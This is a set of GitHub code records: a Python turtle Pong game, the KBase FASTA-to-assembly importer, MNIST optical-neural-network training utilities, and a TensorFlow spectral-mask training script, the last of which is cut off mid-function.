+{"seq_id":"70817389927","text":"from turtle import Screen\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import Scoreboard\nimport time\n\nscreen = Screen()\nscreen.bgcolor(\"#191919\")\nscreen.setup(width=800, height=600)\nscreen.title(\"PyPong\")\nscreen.tracer(0)\n\nr_paddle = Paddle((350, 0))\nl_paddle = Paddle((-350, 0))\nball = Ball()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(r_paddle.move_up, \"Up\")\nscreen.onkey(r_paddle.move_down, \"Down\")\nscreen.onkey(l_paddle.move_up, \"w\")\nscreen.onkey(l_paddle.move_down, \"s\")\n\ngame_on = True\nwhile game_on:\n time.sleep(ball.move_speed)\n screen.update()\n ball.move()\n # Collision with top and bottom walls\n if ball.ycor() > 280 or ball.ycor() < -280:\n ball.bounce_y()\n # Collision with paddles\n if ball.distance(r_paddle) < 50 and ball.xcor() > 320 or ball.distance(l_paddle) < 50 and ball.xcor() < -320:\n ball.bounce_x()\n # detect misses\n # right player\n if ball.xcor() > 380:\n ball.reset_position()\n scoreboard.l_point()\n\n # left player\n if ball.xcor() < -380:\n ball.reset_position()\n scoreboard.r_point()\n\nscreen.exitonclick()\n","repo_name":"cmlohr/py-pong","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8163196434","text":"import json\nimport os\nimport os.path\nfrom pathlib import Path\nimport sys\nimport uuid\nfrom typing import List, Callable\nfrom collections import Counter\nfrom hashlib import md5\n\nfrom Bio import SeqIO\n\nfrom installed_clients.DataFileUtilClient import DataFileUtil\n\n\n_WSID = 'workspace_id'\n_MCL = 'min_contig_length'\n_INPUTS = 'inputs'\n_FILE = 'file'\n_NODE = 'node'\n_ASSEMBLY_NAME = 'assembly_name'\n\n\ndef _upa(object_info):\n return f'{object_info[6]}/{object_info[0]}/{object_info[4]}'\n\nclass FastaToAssembly:\n\n # Note added X due to kb|g.1886.fasta\n _VALID_CHARS = \"-ACGTUWSMKRYBDHVNX\"\n _AMINO_ACID_SPECIFIC_CHARACTERS = \"PLIFQE\"\n def __init__(self,\n dfu: DataFileUtil,\n scratch: Path,\n uuid_gen: Callable[[], uuid.UUID] = lambda: uuid.uuid4()):\n self._scratch = scratch\n self._dfu = dfu\n self._uuid_gen = uuid_gen\n\n def import_fasta(self, params):\n print('validating parameters')\n mass_params = self._set_up_single_params(params)\n return self._import_fasta_mass(mass_params)[0]\n\n def import_fasta_mass(self, params):\n print('validating parameters')\n self._validate_mass_params(params)\n return self._import_fasta_mass(params)\n\n def _import_fasta_mass(self, params):\n # For now this is completely serial, but theoretically we could start uploading\n # Blobstore nodes when some fraction of the initial checks are done, start uploading\n # Workspace obects when some fraction of the Blobstore nodes are done, parallelize\n # the file filtering / parsing, etc.\n # For now keep it simple\n # Also note all the assembly data is kept in memory once parsed, but it contains\n # no sequence info and so shouldn't be too huge. Could push to KBase in batches or\n # save to disk if that's an issue\n # We also probably want to add some retries for saving data, but that should go\n # in DataFileUtils if it's not there already\n # Finally, if more than 1G worth of assembly object data is sent to the workspace at once,\n # the call will fail. May need to add some checking / splitting code around this.\n if _FILE in params[_INPUTS][0]:\n input_files = self._stage_file_inputs(params[_INPUTS])\n else:\n input_files = self._stage_blobstore_inputs(params[_INPUTS])\n\n mcl = params.get(_MCL)\n assembly_data = []\n output = []\n for i in range(len(input_files)):\n # Hmm, all through these printouts we should really put the blobstore node here as\n # well as the file if it exists... wait and see if that code path is still actually\n # used\n if mcl:\n print(f'filtering FASTA file {input_files[i]} by contig length '\n + f'(min len={mcl} bp)')\n input_files[i] = self._filter_contigs_by_length(input_files[i], mcl)\n output.append({'filtered_input': str(input_files[i]) if mcl else None})\n print(f'parsing FASTA file: {input_files[i]}')\n assdata = self._parse_fasta(\n input_files[i],\n params[_INPUTS][i].get('contig_info') or {})\n print(f' - parsed {assdata[\"num_contigs\"]} contigs, {assdata[\"dna_size\"]} bp')\n if not assdata[\"num_contigs\"]:\n raise ValueError(\"Either the original FASTA file contained no sequences or they \"\n + \"were all filtered out based on the min_contig_length \"\n + f\"parameter for file {input_files[i]}\")\n assembly_data.append(assdata)\n\n print('saving assemblies to KBase')\n file_handles = self._save_files_to_blobstore(input_files)\n assobjects = []\n for assdata, file_handle, inputs, sourcefile in zip(\n assembly_data, file_handles, params[_INPUTS], input_files):\n ao = self._build_assembly_object(assdata, file_handle, inputs)\n assobjects.append(ao)\n # this appears to be completely unused\n with open(sourcefile.parent / \"example.json\", \"w\") as f:\n json.dump(ao, f)\n\n # save to WS and return\n assembly_infos = self._save_assembly_objects(\n params[_WSID],\n [p[_ASSEMBLY_NAME] for p in params[_INPUTS]],\n assobjects\n )\n for out, ai in zip(output, assembly_infos):\n out['upa'] = _upa(ai)\n return output\n\n def _build_assembly_object(self, assembly_data, fasta_file_handle_info, params):\n \"\"\" construct the WS object data to save based on the parsed info and params \"\"\"\n assembly_data['assembly_id'] = params[_ASSEMBLY_NAME]\n assembly_data['fasta_handle_ref'] = fasta_file_handle_info['handle']['hid']\n assembly_data['fasta_handle_info'] = fasta_file_handle_info\n\n assembly_data['type'] = 'Unknown'\n if 'type' in params:\n assembly_data['type'] = params['type']\n\n if 'external_source' in params:\n assembly_data['external_source'] = params['external_source']\n\n if 'external_source_id' in params:\n assembly_data['external_source_id'] = params['external_source_id']\n\n if 'external_source_origination_date' in params:\n # TODO this is an arbitrary string, which isn't useful. If this field is actually\n # used, make a new field with a standard timestamp format (epoch date?), validate that\n # format, and deprecate this field\n assembly_data['external_source_origination_date'] = params['external_source_origination_date']\n\n return assembly_data\n\n def _parse_fasta(self, fasta_file_path: Path, extra_contig_info):\n \"\"\" Do the actual work of inspecting each contig \"\"\"\n\n # TODO TEST this needs more extensive unit testing\n # variables to store running counts of things\n total_length = 0\n base_counts = {'A': 0, 'G': 0, 'C': 0, 'T': 0}\n md5_list = []\n\n # map from contig_id to contig_info\n all_contig_data = {}\n\n for record in SeqIO.parse(str(fasta_file_path), \"fasta\"):\n # SeqRecord(seq=Seq('TTAT...', SingleLetterAlphabet()),\n # id='gi|113968346|ref|NC_008321.1|',\n # name='gi|113968346|ref|NC_008321.1|',\n # description='gi|113968346|ref|NC_008321.1| Shewanella sp. MR-4 chromosome, complete genome',\n # dbxrefs=[])\n\n sequence = str(record.seq).upper()\n\n contig_info = {\n 'contig_id': record.id,\n 'name': record.id,\n 'description': record.description[len(record.id):].strip(),\n 'length': len(record.seq)\n }\n\n # 1) compute sequence character statistics running total\n total_length += contig_info['length']\n sequence_count_table = dict(Counter(sequence))\n for character in sequence_count_table:\n if character in base_counts:\n base_counts[character] = base_counts[character] + sequence_count_table[character]\n else:\n base_counts[character] = sequence_count_table[character]\n if character not in self._VALID_CHARS:\n if character in self._AMINO_ACID_SPECIFIC_CHARACTERS:\n raise ValueError('This FASTA file may have amino acids in it instead '\n 'of the required nucleotides.')\n raise ValueError(f\"This FASTA file has non nucleic acid characters: \"\n f\"{character}\")\n\n # 2) record number of 'N' characters (only set if there are some)\n Ncount = 0\n if 'N' in sequence_count_table:\n Ncount = sequence_count_table['N']\n contig_info['Ncount'] = Ncount\n\n # 2b) record if the contig is circular\n # TODO should throw an error if ECI has invalid record IDs\n if record.id in extra_contig_info:\n if 'is_circ' in extra_contig_info[record.id]:\n # TODO supposed to be a boolean, should check for 1 or 0\n contig_info['is_circ'] = int(extra_contig_info[record.id]['is_circ'])\n if 'description' in extra_contig_info[record.id]:\n contig_info['description'] = str(extra_contig_info[record.id]['description'])\n\n # 3) record md5 checksum\n contig_md5 = md5(sequence.encode()).hexdigest()\n contig_info['md5'] = contig_md5\n md5_list.append(contig_md5)\n\n # 4) record the all important GC to ~3 significant digits\n GC_count = 0\n for base in ['G', 'C']:\n if base in sequence_count_table:\n GC_count += sequence_count_table[base]\n contig_info['gc_content'] = round(float(GC_count) / float(contig_info['length']), 5)\n\n # 5) add to contig list\n if contig_info['contig_id'] in all_contig_data:\n raise ValueError('The FASTA header key ' + contig_info['contig_id'] +\n 'appears more than once in the file')\n\n all_contig_data[contig_info['contig_id']] = contig_info\n\n # Aggregate stats for the data\n total_gc_content = None\n if total_length > 0:\n total_gc_content = round(float(base_counts['G'] + base_counts['C']) / float(total_length), 5)\n assembly_data = {\n 'md5': md5(\",\".join(sorted(md5_list)).encode()).hexdigest(),\n 'base_counts': base_counts,\n 'dna_size': total_length,\n 'gc_content': total_gc_content,\n 'contigs': all_contig_data,\n 'num_contigs': len(all_contig_data)\n }\n return assembly_data\n\n @staticmethod\n def _fasta_filter_contigs_generator(fasta_record_iter, min_contig_length):\n \"\"\" generates SeqRecords iterator for writing from a legacy contigset object \"\"\"\n rows = 0\n rows_added = 0\n for record in fasta_record_iter:\n rows += 1\n if len(record.seq) >= min_contig_length:\n rows_added += 1\n yield record\n print(f' - filtered out {rows - rows_added} of {rows} contigs that were shorter '\n f'than {(min_contig_length)} bp.')\n\n def _filter_contigs_by_length(self, fasta_file_path: Path, min_contig_length) -> Path:\n \"\"\" removes all contigs less than the min_contig_length provided \"\"\"\n filtered_fasta_file_path = Path(str(fasta_file_path) + '.filtered.fa')\n\n fasta_record_iter = SeqIO.parse(str(fasta_file_path), 'fasta')\n SeqIO.write(self._fasta_filter_contigs_generator(fasta_record_iter, min_contig_length),\n str(filtered_fasta_file_path), 'fasta')\n\n return filtered_fasta_file_path\n\n def _save_assembly_objects(self, workspace_id, assembly_names, ass_data):\n print('Saving Assemblies to Workspace')\n sys.stdout.flush()\n ws_inputs = []\n for assname, assdata_singular in zip(assembly_names, ass_data):\n ws_inputs.append({\n 'type': 'KBaseGenomeAnnotations.Assembly', # This should really be versioned...\n 'data': assdata_singular,\n 'name': assname\n })\n return self._dfu.save_objects({'id': workspace_id, 'objects': ws_inputs})\n\n def _save_files_to_blobstore(self, files: List[Path]):\n print(f'Uploading FASTA files to the Blobstore')\n sys.stdout.flush()\n blob_input = [{'file_path': str(fp), 'make_handle': 1} for fp in files]\n return self._dfu.file_to_shock_mass(blob_input)\n\n def _stage_file_inputs(self, inputs) -> List[Path]:\n in_files = []\n for inp in inputs:\n if not os.path.isfile(inp[_FILE]):\n raise ValueError(\n \"KBase Assembly Utils tried to save an assembly, but the calling \"\n + f\"application specified a file ('{inp[_FILE]}') that is missing. \"\n + \"Please check the application logs for details.\")\n # Ideally we'd have some sort of security check here but the DTN files could\n # be mounted anywhere...\n # TODO check with sysadmin about this - checked, waiting on clear list of safedirs\n fp = Path(inp[_FILE]).resolve(strict=True)\n # make the downstream unpack call unpack into scratch rather than wherever the\n # source file might be\n file_path = self._create_temp_dir() / fp.name\n # symlink doesn't work, because in DFU filemagic doesn't follow symlinks, and so\n # DFU won't unpack symlinked files\n os.link(fp, file_path)\n in_files.append(file_path)\n # extract the file if it is compressed\n # could add a target dir argument to unpack_files, not sure how much work that might be\n fs = [{'file_path': str(fp), 'unpack': 'uncompress'} for fp in in_files]\n unpacked_files = self._dfu.unpack_files(fs)\n return [Path(uf['file_path']) for uf in unpacked_files]\n\n def _stage_blobstore_inputs(self, inputs) -> List[Path]:\n blob_params = []\n for inp in inputs:\n blob_params.append({\n 'shock_id': inp[_NODE],\n 'file_path': str(self._create_temp_dir()),\n 'unpack': 'uncompress' # Will throw an error for archives\n })\n dfu_res = self._dfu.shock_to_file_mass(blob_params)\n return [Path(dr['file_path']) for dr in dfu_res]\n\n def _create_temp_dir(self):\n tmpdir = self._scratch / (\"import_fasta_\" + str(self._uuid_gen()))\n os.makedirs(tmpdir, exist_ok=True)\n return tmpdir\n\n def _set_up_single_params(self, params):\n inputs = dict(params)\n ws_id = self._get_int(inputs.pop(_WSID, None), _WSID)\n ws_name = inputs.pop('workspace_name', None)\n if (bool(ws_id) == bool(ws_name)): # xnor\n raise ValueError(f\"Exactly one of a {_WSID} or a workspace_name must be provided\")\n if not ws_id:\n print(f\"Translating workspace name {ws_name} to a workspace ID. Prefer submitting \"\n + \"a workspace ID over a mutable workspace name that may cause race conditions\")\n ws_id = self._dfu.ws_name_to_id(params['workspace_name'])\n\n if not inputs.get(_ASSEMBLY_NAME):\n raise ValueError(f\"Required parameter {_ASSEMBLY_NAME} was not defined\")\n\n # one and only one of either 'file' or 'shock_id' is required\n file_ = inputs.pop(_FILE, None)\n shock_id = inputs.pop('shock_id', None)\n if (bool(file_) == bool(shock_id)): # xnor\n raise ValueError(f\"Exactly one of {_FILE} or shock_id is required\")\n if file_:\n if not isinstance(file_, dict) or 'path' not in file_:\n raise ValueError('When specifying a FASTA file input, \"path\" field was '\n + f'not defined in \"{_FILE}\"')\n mass_params = {\n _WSID: ws_id,\n # Ideally set of minimum of 2 here, but left at 1 for backwards compatibility\n _MCL: self._get_int(inputs.pop(_MCL, None), f\"If provided, {_MCL}\"),\n _INPUTS: [inputs]\n }\n if file_:\n inputs[_FILE] = params[_FILE]['path']\n else:\n inputs[_NODE] = params['shock_id']\n return mass_params\n\n def _validate_mass_params(self, params):\n ws_id = self._get_int(params.get(_WSID), _WSID)\n if not ws_id:\n raise ValueError(f\"{_WSID} is required\")\n inputs = params.get(_INPUTS)\n if not inputs or type(inputs) != list:\n raise ValueError(f\"{_INPUTS} field is required and must be a non-empty list\")\n for i, inp in enumerate(inputs, start=1):\n if type(inp) != dict:\n raise ValueError(f\"Entry #{i} in {_INPUTS} field is not a mapping as required\")\n file_ = inputs[0].get(_FILE)\n if bool(file_) == bool(inputs[0].get(_NODE)): # xnor\n raise ValueError(f\"Entry #1 in {_INPUTS} field must have exactly one of \"\n + f\"{_FILE} or {_NODE} specified\")\n field = _FILE if file_ else _NODE\n for i, inp in enumerate(inputs, start=1):\n if not inp.get(field):\n raise ValueError(\n f\"Entry #{i} in {_INPUTS} must have a {field} field to match entry #1\")\n if not inp.get(_ASSEMBLY_NAME):\n raise ValueError(f\"Missing {_ASSEMBLY_NAME} field in {_INPUTS} entry #{i}\")\n self._get_int(params.get(_MCL), f\"If provided, {_MCL}\", minimum=2)\n\n def _get_int(self, putative_int, name, minimum=1):\n if putative_int is not None:\n if type(putative_int) != int:\n raise ValueError(f\"{name} must be an integer, got: {putative_int}\")\n if putative_int < minimum:\n raise ValueError(f\"{name} must be an integer >= {minimum}\")\n return putative_int\n","repo_name":"kbaseapps/AssemblyUtil","sub_path":"lib/AssemblyUtil/FastaToAssembly.py","file_name":"FastaToAssembly.py","file_ext":"py","file_size_in_byte":17197,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"4536169800","text":"'''\nThis file contains functionalities for training and loading the various models that were designed in this project.\nBased on the codebase at https://github.com/mike-fang/imprecise_optical_neural_network. The majority of the file is my own code.\n\n@version 3.8.2021\n'''\n\n\nimport numpy as np\nprint(1)\nimport torch as th\nprint(2)\nimport matplotlib.pylab as plt\nprint(3)\nfrom optical_nn import *\nprint(4)\nimport complex_torch_var as ct\nprint(5)\nfrom mnist import *\nprint(6)\nimport os\nprint(7)\nfrom time import time\nprint(8)\nfrom functools import partial\nprint(9)\nfrom glob import glob\nprint(10)\nfrom default_params import *\nprint(11)\nfrom torch.utils.tensorboard import SummaryWriter\n\nwriter = SummaryWriter('runs/QONN')\nprint(\"writer created\")\n\n\nDIR_PATH = os.path.dirname(os.path.realpath(__file__))\n\n# Good learning rates for different networks\nLR_FFT = 5e-2\nLR_GRID = 2.5e-4\nLR_COMPLEX = 5e-3\n\n'''\nTrain networks based on ComplexNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_complex(f=F_COMPLEX_TRAIN, n_h=[256, 256]):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 10\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = 1.0e-3\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_complex(hidden_units=n_h)\n print(net)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params, writer=writer)\n optim_params['lr'] /= 5\n\n train(net, **train_params, optim_params=optim_params, writer=writer, iteration = 1)\n acc = get_acc(net)\n\n print(f'Trained ComplexNet with accuracy {acc}.')\n writer.close()\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on a modified GridNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_cgrd(f=F_CGRD_TRAIN):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_GRID\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(unitary=CGRDUnitary)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = get_acc(net)\n\n print(f'Trained ComplexGridNet with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on GridNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_grid(f=F_GRID_TRAIN, n_h=[256, 256]):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_GRID\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(hidden_units=n_h)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = get_acc(net)\n\n print(f'Trained GridNet with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on FFTNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_fft(f=F_FFT_TRAIN, n_h=[256, 256]):\n \n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_FFT*3\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(FFTUnitary, hidden_units=n_h)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = get_acc(net)\n\n print(f'Trained FFTNet with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nConverts a ComplexNet into a GridNet.\n\nInputs:\n complex_net: the ComplexNet to convert\n f: location to save the GridNet\n rand_S: randomize GridNet structure\n'''\n'''\ndef convert_save_grid_net(complex_net=None, f=None, rand_S=True):\n if complex_net is None:\n complex_net = load_complex()\n\n if f is None:\n f = F_GRID_TRAIN if rand_S else F_GRID_ORD_TRAIN\n\n grid_net = complex_net.to_grid_net(rand_S=rand_S).to(DEVICE)\n acc = get_acc(grid_net)\n print(f'Converted to GridNet with accuracy {acc} with {\"shuffled\" if rand_S else \"ordered\"} singular values.')\n th.save(grid_net.state_dict(), f)\n print(f'Saved GridNet at {f}')\n'''\n\n'''\nTrain the ComplexNet in batches.\n\nInputs:\n n_train: Number of batches to train for\n dir: directory to save batches\n'''\ndef batch_train_complex(n_train, dir = DIR_COMPLEX_TRAIN):\n for _ in range(n_train):\n f = os.path.join(dir, f'{time():.0f}')\n train_complex(f=f)\n\n'''\nConvert a batch trained ComplexNet to a GridNet\n\nInputs:\n dir: directory of batches\n'''\n'''\ndef batch_convert(dir = DIR_COMPLEX_TRAIN):\n for f in glob(os.path.join(dir, '*')):\n net = load_complex(f)\n convert_save_grid_net(net, f=f+'_grid')\n'''\n\n'''\nLoad a ComplexNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_complex(f=F_COMPLEX_TRAIN):\n net = mnist_complex()\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'ComplexNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a GridNet from Directory and generate accuracy/confusion matrices.\n\nInputs:\n f: Directory of the model\n rand_S: whether or not to randomize GridNet states\n report_acc: whether or not to generate accuracy/confusion matrices\n\nOutputs:\n The loaded model\n'''\ndef load_grid(f=os.path.join(DIR_TRAINED_MODELS, 'grid_1_layer.pth'), rand_S=True, report_acc=True):\n if f is None:\n f = F_GRID_TRAIN if rand_S else F_GRID_ORD_TRAIN\n net = mnist_ONN()\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'GridNetOrdered loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a FFTNet from Directory.\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_fft(f=os.path.join(DIR_TRAINED_MODELS, 'fft_net.pth')):\n net = mnist_ONN(FFTUnitary)\n print(net)\n print(th.load(f, map_location=DEVICE))\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'FFTNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a CGRDNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_cgrd(f=F_CGRD_TRAIN):\n net = mnist_ONN(CGRDUnitary)\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'CGRDNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a Truncated GridNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_trunc_grid(f=os.path.join(DIR_TRAINED_MODELS, 'truncated_grid.pth')):\n net = mnist_grid_truncated()\n print(net)\n print(th.load(f, map_location=DEVICE))\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'Truncated GridNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\nif __name__ == '__main__':\n #train_complex()\n net = load_grid()\n \n for data, target in mnist_loader(train=False, batch_size=100, shuffle=False):\n continue\n data = data.view(-1, 28**2)\n data, target = data.to(DEVICE), target.to(DEVICE)\n print(th.max(net(data), dim=1))\n","repo_name":"rishab-partha/Quantum-Optical-ConvNet","sub_path":"train_mnist.py","file_name":"train_mnist.py","file_ext":"py","file_size_in_byte":8614,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"}
+{"seq_id":"72582360807","text":"import numpy as np\nimport tensorflow as tf\nimport scipy.io as scio\nimport h5py\nimport time\nimport os, os.path\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\n\n\n\n\n\nTRAIN_ROOT = '/media/coc/Dataset/train/'\nTEST_ROOT = '/media/coc/Dataset/test/'\nMATFILE = '/media/coc/Dataset/model-20180124.mat'\nPARTITIONS = 4\n\nBM_BINS = 257\nBM_SPREAD = 24\nHIDDEN_LAYER_WIDTH = 2048\n\nN_EPOCHS = 100\nBATCH_SIZE_INIT = 1000\nLEARN_RATE_INIT = 0.01\nDROPOUT_COEFF = 0.8\nL2_LOSS_COEFF = 0.00\nMOMENTUM_COEFF = 0.9\n\n\n\n\nTRAIN_PARTS = len([name for name in os.listdir(TRAIN_ROOT)])\nTEST_PARTS = len([name for name in os.listdir(TEST_ROOT)])\nprint(TRAIN_PARTS)\nprint(TEST_PARTS)\nrng = np.random.RandomState(842)\n\n\n\n\n\n##########################\n## GRAPH ##\n##########################\nclass Dense:\n\n def __init__(self, in_dim, out_dim, function=lambda x: x):\n self.W = tf.Variable(rng.uniform(low = -0.1, high = 0.1, size=(in_dim, out_dim)).astype('float32'), name='W')\n self.b = tf.Variable(np.zeros([out_dim]).astype('float32'))\n self.function = function\n self.params = [self.W, self.b]\n # self.ae = Autoencoder(in_dim, out_dim, self.W, self.function)\n\n def f_prop(self, x):\n u = tf.matmul(x, self.W) + self.b\n self.z = self.function(u)\n return self.z\n\n # def pretrain(self, x, noise):\n # cost, reconst_x = self.ae.reconst_error(x, noise)\n # return cost, reconst_x\n\n\n\ndef f_props(layers, x):\n for i, layer in enumerate(layers):\n x = layer.f_prop(x)\n if(i != len(layers)-1):\n x = tf.nn.dropout(x, keep_prob)\n return x\n\n\n\n\nlayers = [\n Dense(BM_BINS*BM_SPREAD, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, BM_BINS)\n]\n\nkeep_prob = tf.placeholder(tf.float32)\nx = tf.placeholder(tf.float32, [None, BM_BINS*BM_SPREAD])\nt = tf.placeholder(tf.float32, [None, BM_BINS])\ny = f_props(layers, x)\nlrate_p = tf.placeholder(tf.float32)\nmt_p = tf.placeholder(tf.float32)\n\n# cost = tf.reduce_mean(tf.reduce_sum((y - t)**2, 1))\ncost_op = (tf.reduce_mean(tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(labels=t, logits=y), 1)) + \n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[0].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[1].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[2].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[3].W)))\ntrain_op = tf.train.MomentumOptimizer(learning_rate=lrate_p, momentum=mt_p).minimize(cost_op)\n\n# saver = tf.train.Saver()\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n\n\n\n\n\n\n##########################\n## PROCESSING ##\n##########################\n\ndef load_dataset_to_mem(path, part_list):\n\n temp = scio.loadmat(path + 't_' + str(part_list[0]) + '.mat')\n spect = np.array(temp['spec'], dtype='float32')\n label = np.array(temp['bm'], dtype='float32')\n del temp\n\n for p_ in range(1, part_list.shape[0]):\n\n temp = scio.loadmat(path + 't_' + str(part_list[p_]) + '.mat')\n temp_spect = np.array(temp['spec'], dtype='float32')\n temp_label = np.array(temp['bm'], dtype='float32')\n \n spect = np.concatenate((spect,temp_spect))\n label = np.concatenate((label,temp_label))\n\n del temp_label\n del temp_spect\n del temp\n\n return spect, label\n\n\n\n\ndef evaluate_cost(spect, label):\n\n cost_value = sess.run(cost_op, feed_dict={x:spect, t:label, keep_prob:1.0})\n return cost_value\n\n\n\n\ndef training():\n\n evaluate_cost_opt = 1000000.0\n mt = MOMENTUM_COEFF\n lrate = LEARN_RATE_INIT\n lbs = BATCH_SIZE_INIT\n\n test_datapool, test_labelpool = load_dataset_to_mem(TEST_ROOT, shuffle(range(1,1+TEST_PARTS)))\n evaluate_cost_val = evaluate_cost(test_datapool, test_labelpool)\n print('[init]: validation cost: %.3f ' % (evaluate_cost_val))\n\n for epoch in range(N_EPOCHS):\n \n # exponential decay (simulated annealing) may converge to 'sharp' global minimum\n # which generalizes poorly. we use hybrid discrete noise scale falling here.\n if epoch >= 20:\n lbs = 2000\n if epoch >= 40:\n lbs = 4000\n if epoch >= 60:\n lbs = 8000\n if epoch >= 70:\n lrate = 0.001\n if epoch >= 80:\n lrate = 0.0001\n if epoch >= 90:\n lrate = 0.00001\n \n time_start = time.time()\n part_list = shuffle(range(1,1+TRAIN_PARTS))\n part_n = len(part_list)\n part_i = 0\n\n part_list_breakout = np.array_split(part_list, PARTITIONS)\n for part_ in part_list_breakout:\n \n train_data, train_label = load_dataset_to_mem(TRAIN_ROOT, part_)\n train_data, train_label = shuffle(train_data, train_label)\n n_batch = train_label.shape[0] // lbs\n\n for i in range(n_batch):\n start = i * lbs\n end = start + lbs\n sess.run(train_op, feed_dict={x:train_data[start:end], t:train_label[start:end], keep_prob:DROPOUT_COEFF, lrate_p:lrate, mt_p:mt})\n\n del train_label\n del train_data \n part_i += 1\n print('...%d/%d'%(part_i,part_n))\n\n evaluate_cost_val = evaluate_cost(test_datapool, test_labelpool)\n time_end = time.time()\n print('[epoch %i] validation cost = %.3f ' % (epoch + 1, evaluate_cost_val))\n print('[epoch %i] time = %.3f (sec)' % (epoch + 1, time_end - time_start))\n\n if (evaluate_cost_val < evaluate_cost_opt):\n save_dict = {}\n save_dict['W1'] = sess.run(layers[0].W)\n save_dict['b1'] = sess.run(layers[0].b)\n save_dict['W2'] = sess.run(layers[1].W)\n save_dict['b2'] = sess.run(layers[1].b)\n save_dict['W3'] = sess.run(layers[2].W)\n save_dict['b3'] = sess.run(layers[2].b)\n save_dict['W4'] = sess.run(layers[3].W)\n save_dict['b4'] = sess.run(layers[3].b)\n\n scio.savemat(MATFILE, save_dict)\n evaluate_cost_opt = evaluate_cost_val\n print('[epoch %d] model saved' % (epoch + 1))\n\n del test_labelpool\n del test_datapool\n\n\n\n\ntraining()\nsess.close()\n\n\n\n\n\n\n\n\n##########################\n## NOT IN USE ##\n##########################\ndef make_window_buffer(x, neighbor=3):\n m, n = x.shape\n tmp = np.zeros(m * n * (neighbor * 2 + 1), dtype='float32').reshape(m, -1)\n for i in range(2 * neighbor + 1):\n if (i <= neighbor):\n 